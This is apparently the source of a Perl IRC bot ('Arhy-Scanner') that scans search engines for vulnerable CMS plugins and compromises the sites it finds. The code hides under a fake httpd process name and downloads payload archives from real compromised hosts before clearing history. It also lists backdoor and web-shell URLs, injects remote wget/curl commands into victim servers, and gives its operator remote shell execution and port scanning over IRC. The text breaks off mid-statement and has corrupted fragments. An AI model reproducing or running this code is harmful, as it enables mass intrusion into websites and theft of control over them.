#!/usr/bin/perl use HTTP::Request; use HTTP::Request::Common; use HTTP::Request::Common qw(POST); use LWP::Simple; use LWP 5.64; use LWP::UserAgent; use Socket; use IO::Socket; use IO::Socket::INET; use IO::Select; use MIME::Base64; use URI::Escape; use Digest::MD5 qw(md5_hex); use DBI; my $datetime = localtime; my $fakeproc = "/usr/sbin/httpd"; my $ircserver = "irc.blackunix.us"; my $number = int(rand(99)); my $ircport = "7000"; my $nickname = "Arhy-Scanner"; my $ident = "yes"; my $channel = "#Arhy"; my $chanxxx = "#Arhy"; my $admin = "Crusher"; my $fullname = "arhy-Bot"; my $rawmsg = $ARGV[4]; my $msgraw = $ARGV[5]; my $nob0dy = "4,1UnKnown "; my $thumblogo = "0,1TIM "; my $lfilogo = "4,1LFI "; my $e107logo = "0,1E107 "; my $rfilogo = "4,1rfi "; my $mmfclogo = "0,1MMFC "; my $zenlogo = "4,1ZEN "; my $jcelogo = "0,1JCE "; my $xmllogo = "4,1XML "; my $cliplogo = "0,1CLIPBUCKET "; my $redlogo = "4,1REDMYSTIC "; my $whmlogo = "0,1WHMCS "; my $livelogo = "4,1LIVECART "; my $reflogo = "0,1REFLEX-GALLERY "; my $oscologo = "4,1OSCOMMERCE "; my $switchlogo = "0,1SWITCHBLADE "; my $photologo = "4,1PHOTOSTORE "; my $eleminlogo = "0,1ELEMIN "; my $revlogo = "4,1(0,1@4,1RevSlider4,1)"; my $foliologo = "4,1BT-PORTFOLIO "; my $rcilogo = "0,1RCI "; my $uplogo = "4,1UP "; my $jnewslogo = "0,1JNEWS "; my $jinclogo = "4,1JINC "; my $mglogo = "0,1MagEnto "; my $mg2logo = "4,1(0,1@4,1MagMi4,1)"; my $oscologo = "4,1<4,1X4,1> 0,1OsCo 4,1<4,1X4,1>"; my $jdllogo = "15(7@2jDownLoads15)"; my $fablogo = "15(7@Com-Pabrik15)"; my $flelogo = "15[2@12Fx-Content15]"; my $jmulogo = "15[2@12JM-Media15]"; my $alplogo = "15[2@12AU-Points15]"; my $actlogo = "15[2@12AP-Content15]"; my $horlogo = "15[2@12Hornot215]"; my $osco2cmd = "!osc".$number.""; my $thumbcmd = "!tix"; my $lficmd = "!lfx"; my $e107cmd = "!e107x"; my $rficmd = "!rfix"; my $mmfccmd = "!mfcx"; my $zencmd = "!zen"; my $jcecmd = "!jcxx"; my $xmlcmd = "!xmlx"; my $clipcmd = "!clipx"; my $redcmd = "!redx"; my $whmcmd = "!whmx"; my $livecmd = "!livex"; my $refcmd = "!refx"; my $oscocmd = "!osx"; my $switchcmd = "!swx"; my $photocmd = "!phx"; my $elemincmd = "!elex"; my $revcmd = "!rev"; my $rescmd = "!res"; my $mgcmd = "!mag"; my $mg2cmd = "!mag2"; my $foliocmd = "!fox"; my $rcicmd = "!rxx"; my $upcmd = "!upx"; my $jnewscmd = "!jnewsx"; my $jinccmd = "!jincx"; my $jdlcmd = "!jdl"; my $fabcmd = "!fab"; my $flecmd = "!fle"; my $jmucmd = "!jmu"; my $alpcmd = "!alp"; my $actcmd = "!act"; my $horcmd = "!hor"; my $ftpcmd = "!ftpx"; my $timot = 10; my $jembot = "images.php"; my $jembotx = "cpx.php"; #my $ngilang = "rm -rf"; qx($ngilang $0); my $silentmode = 1; my $hostinjector = "wordpress.com.advanced-tec.com"; my $thumbid = "http://".$hostinjector."/xp.php"; my $thumbidx = "http://".$hostinjector."/win7.php"; my $injectorrfi = "http://".$hostinjector."/id.txt"; my $botshellrfi = "http://".$hostinjector."/sad.txt"; my $botshellrfi2 = "http://".$hostinjector."/sadow.txt"; my $rceinjector = "http://203.89.187.238/brycegallery.co.nz//cache/id.txt"; my $bogel = "http://landhaus-schermer.at/test/php/4nt-crew.php"; my $fabfile = "http://www.puertascavero.com/videos/4nt-crew.php"; my $injector = "http://ezenmedia.net/.wp-user/ipays.txt"; my $backdoor = "http://milano2010.omat360.it/images/smilies/moi.jpg"; my $backdoor2 = "http://milano2010.omat360.it/images/smilies/moi.jpg"; my $botshell = "http://egystore.org/image/foto81.jpg"; my $botshell2 = "http://egystore.org/image/foto82.jpg"; my $botshell3 = "http://egystore.org/image/foto83.jpg"; my $subticket = "/submitticket.php?step=2&deptid=1"; my $md5php = md5_hex($thumbid).".php"; my $md5cps = md5_hex($thumbidx).".php"; my $timid = uri_escape($thumbid); my $timidx = uri_escape($thumbidx); my $action = "/data/shell.php"; my $wgetdon = "?cmd=wget%20http%3A%2F%2F".$hostinjector."%2Fmagic.php;wget%20http%3A%2F%2F".$hostinjector."%2Fbtx.php;wget%20http%3A%2F%2F".$hostinjector."%2Fmagic1.php"; my $lwpdon = "?cmd=lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fmagic.php;lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fbtx.php;lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fcpx.php"; my $curldon = "?cmd=curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fmagic.php;curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fbtx.php;curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fcpx.php"; my $uagent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"; sub randomagent { my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31' ); my $random = $array[rand @array]; return($random); } my $useragent = randomagent(); my $jpath = "?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; my $jpath1 = "https%253A%252F%252Fwww.google.com%252Fsearch?q="; my $jack1 = "http://www.panini.nl/lisse/wp-includes/arhy-website.php?q="; my $jack2 = "http://prolocosanzenone.dev1.noonic.com/wp-includes/arhy-website.php?q="; my $jack3 = "http://unipak.nl/wp-includes/arhy-website.php?q="; my $jack4 = "http://mojadietaonline.pl/wp-includes/arhy-website.php?q="; my $jack5 = "http://www.balum.com.co/sitemap/docss/arhy-website.php?q="; my $jack6 = "http://www.hyattlatam.com/menph/holidays/en/arhy-website.php?q="; my $jack7 = "http://partosazancnc.ir/wp-includes/arhy-website.php?q="; my $jack8 = "http://8webdemo.in/herbalife/wp-includes/images/bypass302.php?q="; my $jack9 = "http://www.naofanshe.cn/wp-includes/arhy-website.php?q="; my $jack10 = "http://sabia.com.au/wp-includes/images/bypass302.php?q="; my $engine = "GooGLeCA,GooGLeDE,GooGLeUK,GooGLeFR,GooGLeES,GooGLeIT,GooGLeNL,GooGLeBE,GooGLeCH,GooGLeSE,BaiDu,GooGLeDK,GooGLeNO,GooGLeNZ,GooGLeIE,GooGLeBR,GooGLeAR,GooGLeCO,GooGLeCU,GooGLeCL,GooGLeMX,GooGLeAU,GooGLeRU,GooGLeAT,GooGLePL,GooGLeIL,GooGLeTR,GooGLeUA,GooGLeGR,GooGLeJP,GooGLeCN,GooGLeMY,GooGLeTH,GooGLeIN,GooGLeKR,GooGLeRO,GooGLeTW,GooGLeZA,GooGLePT,BingDE,BingUK,BingCA,BingBR,BingFR,BingES,BingIT,BingBE,BingNL,BingPT,BingNO,BingDK,BingSE,BingCH,BingNZ,BingRU,BingJP,BingCN,BingKR,BingMX,BingAR,BingCL,BingAU,AsKCA,AsKDE,AsKIT,AsKFR,AsKES,AsKRU,AsKNL,AsKUK,AsKBR,AsKPL,AsKAU,AsKAT,AsKJP,AsKSE,AsKMX,AsKNO,AsKDK,AC,AD,AE,AF,AG,AL,AM,AN,AT,AR,AU,BE,HU,OrG,CoM,NeT,PL,IT,ID,MY,ES,UK,US,JP,XXX,TEL,TV,CC,MIL,ASIA,NAME,PRO,TRAVEL,JOBS,MOBI,AERO,CAT,COOP,EDU,GOV,MUSEUM,KR,DE,DK,CA,BR,RO,RU,NL,InfO,FR,IN,MX,CZ,CL,UA,CN,IR,TH,EU,PH,IL,IM,SI,BIZ,AS,AI,AG,AZ,BH,BD,BZ,BO,BA,BW,VG,BG,BI,CO,CD,CG,CK,CR,HR,CU,CI,DJ,DM,DO,EC,EG,SV,EE,ET,FJ,FI,GM,GI,GR,GL,GT,GG,HT,HN,HK,IS,IE,IM,JE,JO,KZ,KE,KG,LV,LS,LY,LI,LT,LU,MW,MT,MU,FM,MN,MS,MA,NA,NP,NZ,NI,NF,NO,OM,PK,PA,PY,PE,PN,PT,PR,QA,RW,SH,SM,SA,SN,SC,SG,SK,ZA,LK,VC,SE,CH,TW,TJ,BS,TO,TT,TR,TM,VI,UG,UY,UZ,VE,VN,ZM,WS,AF,AX,AL,DZ,AO,AQ,AM,AW,AC,BJ,BM,BT,BW,IO,BN,BF,KH,CM,CV,KY,CF,CX,CW,CY,FK,FO,GH,GD,GP,GU,GN,GY,HM,IQ,JM,KI,KW,LA,LB,LR,MO,MG,MV,MP,MQ,MR,YT,MD,MC,ME,MZ,NR,NC,NG,NU,PW,PS,CQ,RE,LC,PM,ST,RS,GS,SL,SX,SB,SO,SU,KN,SR,SZ,TZ,TL,TG,TK,TN,TC,VU,WF,YW,ZW,GooGLe,Yahoo2,KvaSiR,QuinT,Pagina,Clix,ask2,WaLLa,YaHoo,AsK,Bing,OnEt,CLusTy,SaPo,AoL,UoL,LyCos,HotBot,BigLobe,SeZNam,webcrawler,clusty,witch,amidalla,gibla,mywebsearch,dogpile,infocom,searchcom,teoma,volunia,becak,bokep,searchnz"; my @jpaths = ('administrator/components/com_civicrm/civicrm/packages/OpenFlashChart','components/com_civicrm/civicrm/packages/OpenFlashChart','administrator/components/com_acymailing/inc/openflash','components/com_acymailing/inc/openflash','administrator/components/com_jnewsletter/includes/openflashchart','components/com_jnewsletter/includes/openflashchart','administrator/components/com_jinc/classes/graphics','components/com_jinc/classes/graphics','administrator/components/com_maian15/charts','components/com_maian15/charts','components/com_jnews/includes/openflashchart','administrator/components/com_jnews/includes/openflashchart'); my $jvuln = "/php-ofc-library/ofc_upload_image.php"; my $jshell = "/tmp-upload-images/magic.php"; my $inject = "barner]"; my $jcpanel = "/tmp-upload-images/magic.php.pHp"; $SIG{'INT'} = 'IGNORE'; $SIG{'HUP'} = 'IGNORE'; $SIG{'TERM'} = 'IGNORE'; $SIG{'CHLD'} = 'IGNORE'; $SIG{'PS'} = 'IGNORE'; chdir("/tmp/.ICE-unix/"); chop (my $priper = `wget http://pathwaysfinancial.biz/www.arhy.website/arhy.zip;wget http://pathwaysfinancial.biz/www.arhy.website/4nt-crew.zip;wget http://pathwaysfinancial.biz/www.arhy.website/revslider.zip;wget http://pathwaysfinancial.biz/www.arhy.website/showbiz.zip;wget http://axiomatech.com/wp-content/uploads/2014/www.arhy.website.txt -O www.arhy.website.php;wget http://www.danielquadros.com.br/magic.tgz;tar -zxvf magic.tgz;fetch http://www.danielquadros.com.br/magic.tgz;tar -zxvf magic.tgz;curl -O http://www.danielquadros.com.br/magic.tgz;tar -zxvf magic.tgz;rm -fr magic.tgz*;killall -9 sh;history -c`); $ircserver = "$ARGV[0]" if $ARGV[0]; $ircport = "$ARGV[1]" if $ARGV[1]; $nickname = "$ARGV[2]" if $ARGV[2]; $channel = '#'."$ARGV[3]" if $ARGV[3]; $0 = "$fakeproc"."\0" x 16; my $pid = fork; exit if $pid; die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid); our %irc_servers; our %DCC; my $dcc_sel = new IO::Select->new(); $sel_client = IO::Select->new(); sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1]\n"; } else { print $IRC_cur_socket "$_[0]\n"; } } sub connector { my $mynick = $_[0]; my $ircserver_con = $_[1]; my $ircport_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_client->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con"; $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; nick("$mynick"); sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname"); sleep(1);}} sub parse { my $servarg = shift; if ($servarg =~ /^PING \:(.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { if (lc($1) eq lc($mynick)) { $mynick = $4; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; } } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { nick($mynick.int(rand(5))); } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { $mynick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; sendraw("NickServ IDENTIFY petbot"); sendraw("MODE $mynick +R"); sendraw("MODE $mynick +Bx"); sendraw("NS id qwe123"); sleep(3); sendraw("JOIN $channel"); sendraw("JOIN $chanxxx"); sleep(1); sendraw("PRIVMSG $channel :4,1Scanner 0,1By 4,1Arhy 0,1Green 4,1Core!!!"); sendraw("PRIVMSG $admin :Hi $admin im here !!!"); } } my $line_temp; while( 1 ) { while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); } select(undef, undef, undef, 0.01); delete($irc_servers{''}) if (defined($irc_servers{''})); my @ready = $sel_client->can_read(0); next unless(@ready); foreach $fh (@ready) { $IRC_cur_socket = $fh; $mynick = $irc_servers{$IRC_cur_socket}{'nick'}; $nread = sysread($fh, $ircmsg, 4096); if ($nread == 0) { $sel_client->remove($fh); $fh->close; delete($irc_servers{$fh}); } @lines = split (/\n/, $ircmsg); $ircmsg =~ s/\r\n$//; if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5); if ($path eq $mynick) { if ($msg =~ /^PING (.*)/) { sendraw("NOTICE $nick :PING $1"); } if ($msg =~ /^VERSION/) { sendraw("NOTICE $nick :VERSION mIRC v6.21 Khaled Mardam-Bey"); } if ($msg =~ /^TIME/) { sendraw("NOTICE $nick :TIME ".$datetime.""); } if (&isAdmin($nick) && $msg eq "!die") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!killall") { &shell("$path","killall -9 perl"); } if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Restarting..."); } if (&isAdmin($nick) && $msg =~ /^!joinx \#(.+)/) { sendraw("JOIN #".$1); } if (&isAdmin($nick) && $msg =~ /^!partx \#(.+)/) { sendraw("PART #".$1); } if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) { sendraw("NICK ".$1); } if (&isAdmin($nick) && $msg =~ /^!pid/) { sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$"); } if (&isAdmin($nick) && $msg !~ /^!/) { &shell("$nick","$msg"); } if (&isAdmin($nick) && $msg =~ /^!raw (.+)/) { sendraw("$rawmsg $msgraw ".$1); } if (&isAdmin($nick) && $msg =~ /^!say (.+)/) { sendraw("PRIVMSG $rawmsg ".$1); } if (&isAdmin($nick) && $msg =~ /^!act (.+)/) { sendraw("PRIVMSG $rawmsg :ACTION ".$1.""); } if (&isAdmin($nick) && $msg =~ /^!timot\s+(.*) -d/) { $newtimot = $1; $timot = $newtimot; &msg("$admin","9,1 Get Content TimeOut change to4 $timot "); } if (&isAdmin($nick) && $msg =~ /^!chxchan\s+(.+) -d/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { $newchan = $1; $chanxxx = $newchan; &msg("$admin","9,1 xChan change to4 $chanxxx "); }}} } else { if (&isAdmin($nick) && $msg eq "!die") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!killall") { &shell("$path","killall -9 perl"); } if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Restarting..."); } if (&isAdmin($nick) && $msg =~ /^!joinx \#(.+)/) { sendraw("JOIN #".$1); } if (&isAdmin($nick) && $msg eq "!partx") { sendraw("PART $path"); } if (&isAdmin($nick) && $msg =~ /^!partx \#(.+)/) { sendraw("PART #".$1); } if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) { &shell("$path","$1"); } if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) { &shell("$path","$1"); } if (&isAdmin($nick) && $msg =~ /^!silent\s+(.*) -d/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { $smod = $1; if ($smod =~ /ON/) { $silentmode = 1; $silentstat = "ON"; } elsif ($smod =~ /OFF/) { $silentmode = 0; $silentstat = "OFF"; } &msg("$path","4,1[4,1!4,1]0,1Silent 4,1Mode15 $silentstat !!!!"); }}} ##################################################################### HELP COMMAND if ($msg=~ /^!help/) { my $helplogo = "4,1HELP ";dsu &msg("$path","4,1Ketika Sahabat Menjadi Bangsat "); &msg("$path","$helplogo4,1TIM Vuln Scan:0,1 $thumbcmd 4,1[bug] 0,1[dork] "); &msg("$path","$helplogo4,1rfi Vuln Scan:0,1 $rficmd 4,1[dork] "); &msg("$path","$helplogo4,1OSCOMMERCE Vuln Scan:0,1 $oscocmd 4,1[dork] "); &msg("$path","$helplogo4,1E107 Vuln Scan:0,1 $e107cmd 4,1[dork] "); &msg("$path","$helplogo4,1MMFC Vuln Scan:0,1 $mmfccmd 4,1[dork] "); &msg("$path","$helplogo4,1ZEN Vuln Scan:0,1 $zencmd 4,1[dork] "); &msg("$path","$helplogo4,1JCE Vuln Scan:0,1 $jcecmd 4,1[dork] "); &msg("$path","$helplogo4,1XML Vuln Scan:0,1 $xmlcmd 4,1[bug] [dork] "); &msg("$path","$helplogo4,1CLIPBUCKET Vuln Scan:0,1 $clipcmd 4,1[dork] "); &msg("$path","$helplogo4,1REDMYSTIC Vuln Scan:0,1 $redcmd 4,1[dork] "); &msg("$path","$helplogo4,1LIVECART Vuln Scan:0,1 $livecmd 4,1[dork] "); &msg("$path","$helplogo4,1REFLEX-GALLERY Vuln Scan:0,1 $refcmd 4,1[dork] "); &msg("$path","$helplogo4,1PHOTOSTORE Vuln Scan:0,1 $photocmd 4,1[dork] "); &msg("$path","$helplogo4,1SWITCHBLADE Vuln Scan:0,1 $switchcmd 4,1[dork] "); &msg("$path","$helplogo4,1ELEMIN Vuln Scan:0,1 $elemincmd 4,1[dork] "); &msg("$path","$helplogo4,1RevSlider FTP Vuln Scan:0,1 $revcmd 4,1[dork] "); &msg("$path","$helplogo4,1RevSlider Uploader Vuln Scan:0,1 $rescmd 4,1[dork] "); &msg("$path","$helplogo4,1BT-PORTFOLIO Vuln Scan:0,1 $foliocmd 4,1[dork] "); &msg("$path","$helplogo4,1RCI Vuln Scan:0,1 $rcicmd 4,1[dork] "); &msg("$path","$helplogo4,1UPLOADIFY Vuln Scan:0,1 $upcmd 4,1[dork] "); &msg("$path","$helplogo4,1JNEWS Vuln Scan:0,1 $jnewscmd 4,1[dork] "); &msg("$path","$helplogo4,1JINC Vuln Scan:0,1 $jinccmd 4,1[dork] "); &msg("$path","$helplogo4,1Magento Vuln Scan:0,1 $mgcmd 4,1[dork] "); &msg("$path","$helplogo4,1Magento Magmi Scan:0,1 $mg2cmd 4,1[dork] "); &msg("$path","$helplogo4,1Jdownloads Scan:0,1 $jdlcmd 4,1[dork] "); &msg("$path","$helplogo4,1Com Pabrik:0,1 $fabcmd 4,1[dork] "); &msg("$path","$helplogo4,1hornot Vuln Scan:0,1 $horcmd 4,1[dork] "); &msg("$path","$helplogo4,1com_alphacontent Scan:0,1 $actcmd 4,1[dork] "); &msg("$path","$helplogo4,1com_alphauserpoints:0,1 $alpcmd 4,1[dork] "); &msg("$path","$helplogo4,1com_jmultimedia:0,1 $jmucmd 4,1[dork] "); &msg("$path","$helplogo4,1com_flexicontent:0,1 $flecmd 4,1[dork] "); &msg("$path","4,1We Are 0,1 Blackunix-Crew "); } if (&isAdmin($nick) && $msg =~ /^!pid/) { &msg("$nick","4,1Fake Process/PID : $fakeproc - $$"); } if ($msg=~ /^!respon/ || $msg=~ /^!id/) { $inject1 = ""; $inject2 = ""; my $cekby1 = &get_content($rceinjector); my $cekby2 = &get_content($thumbid); if ($cekby1 =~ m/new; $useragent->timeout(5); $request = POST $website,\%form; $response = $useragent->request($request); if ($response->is_success) { my $res = $response->content; if ($res =~ m/Your IP address is(.*)
City:(.*)Country:(.*)
Continent:(.*)
Time/g) { my ($ipaddress,$city,$country,$continent) = ($1,$2,$3,$4); &msg("$path","4,1IP4IP Address :0,1 ".$ip." 4,1[".$ipaddress."]"); &msg("$path","4,1IP4City :0,1 ".$ip." 4,1[".$city."]"); &msg("$path","4,1IP4Country :0,1 ".$ip." 4,1[".$country."]"); &msg("$path","4,1IP4Continent :0,1 ".$ip." 4,1[".$continent."]"); } else { &msg("$path","4,1IP0,1".$ip." 4,1not found in database"); } } else { &msg("$path","4,1IP0,1Cannot open IP database."); } } exit; } } if (&isAdmin($nick) && $msg=~ /^!dns\s+(.*)/){ my $nsku = $1; $mydns = inet_ntoa(inet_aton($nsku)); &msg("$path", "4,1DNS0,1 $nsku 12Resolved to 4 $mydns"); } if (&isAdmin($nick) && $msg=~ /^!port\s+(.*?)\s+(.*)/ ) { my $hostip= "$1"; my $portsc= "$2"; my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7); if ($scansock) { &msg("$path","4,1PORT0,1 $hostip :4,1 $portsc 0,1Successful !"); } else { &msg("$path","4,1PORT0,1 $hostip :4,1 $portsc 0,1Failed !"); } } if (&isAdmin($nick) && $msg eq "!bypass") { my $bystats1 = ""; my $bystats2 = ""; my $bystats3 = ""; my $bystats4 = ""; my $bystats5 = ""; my $bystats6 = ""; my $bystats7 = ""; my $bystats8 = ""; my $bystats9 = ""; my $bystats10 = ""; my $bystats11 = ""; my $bystats12 = ""; my $bystats13 = ""; my $cekby1 = &get_content($jack1."search"); my $cekby2 = &get_content($jack2."search"); my $cekby3 = &get_content($jack3."search"); my $cekby4 = &get_content($jack4."search"); my $cekby5 = &get_content($jack5."search"); my $cekby6 = &get_content($jack6."search"); my $cekby7 = &get_content($jack7."search"); my $cekby8 = &get_content($jack8."search"); my $cekby9 = &get_content($jack9."search"); my $cekby10 = &get_content($jack10."search"); my $cekby11 = &get_content($jack11."search"); my $cekby12 = &get_content($jack12."search"); my $cekby13 = &get_content($jack13."search"); if ($cekby1 =~ /search/i){ $bystats1 = "4,1Up!"; } else { $bystats1 = "0,1Lost!"; } if ($cekby2 =~ /search/i){ $bystats2 = "4,1Up!"; } else { $bystats2 = "0,1Lost!"; } if ($cekby3 =~ /search/i){ $bystats3 = "4,1Up!"; } else { $bystats3 = "0,1Lost!"; } if ($cekby4 =~ /search/i){ $bystats4 = "4,1Up!"; } else { $bystats4 = "0,1Lost!"; } if ($cekby5 =~ /search/i){ $bystats5 = "4,1Up!"; } else { $bystats5 = "0,1Lost!"; } if ($cekby6 =~ /search/i){ $bystats6 = "4,1Up!"; } else { $bystats6 = "0,1Lost!"; } if ($cekby7 =~ /search/i){ $bystats7 = "4,1Up!"; } else { $bystats7 = "0,1Lost!"; } if ($cekby8 =~ /search/i){ $bystats8 = "4,1Up!"; } else { $bystats8 = "0,1Lost!"; } if ($cekby9 =~ /search/i){ $bystats9 = "4,1Up!"; } else { $bystats9 = "0,1Lost!"; } if ($cekby10 =~ /search/i){ $bystats10 = "4,1Up!"; } else { $bystats10 = "0,1Lost!"; } if ($cekby11 =~ /search/i){ $bystats11 = "4,1Up!"; } else { $bystats11 = "0,1Lost!"; } if ($cekby12 =~ /search/i){ $bystats12 = "4,1Up!"; } else { $bystats12 = "0,1Lost!"; } if ($cekby13 =~ /search/i){ $bystats13 = "4,1Up!"; } else { $bystats13 = "0,1Lost!"; } my $bypasslogo = "4,1bypass";sleep(3); &msg("$path","$bypasslogo Checker "); &msg("$path","$bypasslogo 1 ==> $bystats1"); &msg("$path","$bypasslogo 2 ==> $bystats2"); &msg("$path","$bypasslogo 3 ==> $bystats3"); &msg("$path","$bypasslogo 4 ==> $bystats4"); &msg("$path","$bypasslogo 5 ==> $bystats5"); &msg("$path","$bypasslogo 6 ==> $bystats6"); &msg("$path","$bypasslogo 7 ==> $bystats7"); &msg("$path","$bypasslogo 8 ==> $bystats8"); &msg("$path","$bypasslogo 9 ==> $bystats9"); &msg("$path","$bypasslogo 10 ==> $bystats10"); } ##################################################################### SCAN if ($msg =~ /!cari\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $find = $1; &msg($path,"$carilogo4,1 Searching 0,1$find "); &cari($path,$find); } exit; } } if ($msg=~ /^$thumbcmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1 Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4,1$path "); &msg("$path","14scanning timthumb started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,1,$nick); } } } } if (&isAdmin($nick) && $msg =~ /^$e107cmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("contact.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1 Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4,1$path "); &msg("$path","4,1scanning e107 started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,3,$nick); } } } } if (&isAdmin($nick) && $msg =~ /^$zencmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("extras/curltest.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1 Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4,1$path "); &msg("$path","4,1scanning zen cart started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,6,$nick); } } } } if ($msg =~ /^$jcecmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","4,1$nick 0,1 Gay Re-scan detected"); exit; } else { &msg("$chanxxx","4,1@4,1$nick 0,1Coli fucking on 4$path "); &msg("$path","4,1scanning jce started..."); sendraw("MODE $path +m"); &write_dorks($dork); &se_start($path,$bug,$dork,$engine,7,$nick); } } } } if ($msg =~ /^$flecmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/components/com_flexicontent/librairies/phpthumb/phpThumb.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","$flelogo3 $nick, 4Dont try re-scan dork "); exit; } else { &msg("$path","$flelogo 12Dork7 :4 $dork "); &msg("$path","$flelogo 6Search Engine Loading ..."); &se_start($path,$bug,$dork,$engine,30,$nick); &write_dorks($dork); } } } } ############################################################################################## if ($msg =~ /^$jmucmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/components/com_jmultimedia/assets/thumbs/phpthumb/phpThumb.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","$jmulogo3 $nick, 4Dont try re-scan dork "); exit; } else { &msg("$path","$jmulogo 12Dork7 :4 $dork "); &msg("$path","$jmulogo 6Search Engine Loading ..."); &se_start($path,$bug,$dork,$engine,31,$nick); &write_dorks($dork); } } } } ############################################################################################## if ($msg =~ /^$alpcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/components/com_alphauserpoints/assets/phpThumb/phpThumb.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","$alplogo3 $nick, 4Dont try re-scan dork "); exit; } else { &msg("$path","$alplogo 12Dork7 :4 $dork "); &msg("$path","$alplogo 6Search Engine Loading ..."); &se_start($path,$bug,$dork,$engine,32,$nick); &write_dorks($dork); } } } } ############################################################################################## if ($msg =~ /^$actcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/components/com_alphacontent/assets/phpThumb/phpThumb.php",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","$actlogo3 $nic k, 4Dont try re-scan dork "); exit; } else { &msg("$path","$actlogo 12Dork7 :4 $dork "); &msg("$path","$actlogo 